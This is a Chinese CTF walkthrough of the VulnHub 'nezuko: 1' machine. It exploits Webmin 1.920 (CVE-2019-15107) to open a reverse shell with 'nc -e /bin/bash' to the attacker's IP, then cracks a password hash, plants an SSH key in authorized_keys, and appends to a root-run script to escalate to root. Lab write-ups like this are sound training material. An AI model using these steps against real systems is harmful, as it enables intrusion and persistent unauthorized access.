nezuko: 1
靶机下载地址: https://www.vulnhub.com/entry/nezuko-1,352/
靶机说明:
Creator : @yunaranyancat (Twitter)
Difficulty : Easy ~ Intermediate
OS Used: Ubuntu 18.04
Services : Webmin 1.920, Apache, SSH
User : root, zenitsu, nezuko
Hashes : at their home directory
靶机难度:初级-中级
运行环境:攻击机kali linux和主机 靶机nezuko: 1
网络设置:均为Nat模式
依照惯例先发现ip,然后进行端口扫描
访问80端口,除了祢豆子的gif(awsl),没发现
目录扫描:
Robots文件,有一串加密的字符,有4个等号且没有小写字母,推测是base32,解码:
hint from nezuko : this is not the right port to enumerate ^w^
那就看另一个端口,13337端口开启了webmin服务,1.920版本
试了nezuko还有一些常用的账号密码,没登进去,试着爆破失败了,找一下有没有相关漏洞,找到两个:
用第一个试一下CVE:2019-15107(https://www.exploit-db.com/exploits/47293)
复制代码,到kali里新建一个sh文件,然后运行,检测到漏洞存在:
修改代码,把echo '$FLAG'改为反弹shell代码,试了bash -i不成功,用nc反弹成功了
nc -e /bin/bash 192.168.175.140 4321
不过获取的shell并不是一个具有完整交互的shell
在home下面找到一个nezuko.txt文件,拿到第一个flag 1af0941e0c4bd4564932184d47dd8bef
还有个from_zenitsu文件夹,打开看看,里面像是每5分钟就会发来一份新的文件,而且还是以root的权限,看能不能登陆zenitsu这个账号
查看文件里面的内容,没什么东西,只有善逸向祢豆子约会邀请,原来这些是善逸的骚扰短信
还有一个zenitsu文件夹
善逸的flag也拿到了 3f2ada6791f96b6a50a9ee43ee6b62df
还剩root,要提权,先查看/etc/passwd,发现zenitsu账号有一串加密的密码
将密码存放到pass.txt,用john解密:解密结果为meowmeow
想拿xshell直接连,但密码被拒绝,可能ssh的设置不允许远程登陆
要使用su命令,得先把shell换成交互式shell,方法有很多,这里我直接创建ssh会话,现在本地生成密钥
密码随便设置成123456,然会会生成公钥key.pub,复制公钥内容
靶机跳转到ssh路径下,将公钥的内容写入到authorized_keys文件中
然后ssh连接:输入密码123456,成功创建会话
现在可以登陆zenitsu账号了
在nezuko目录下没翻到啥东西,看一下zenitsu目录,找到了骚扰短信脚本
既然它能够以root权限运行,可以利用它反弹shell。
直接echo写入覆盖发现没有权限
用lsattr命令可以查看隐藏权限,chattr +a file使file文件只能追加内容,不能删除、重命名,因此可以直接追加内容
然后kali开启监听,等zenitsu的文件发送。
成功反弹shell,拿到root的flag 3ca33b8158d9dee5c35a7d6d793c7fd5
拿到3个flag,结束。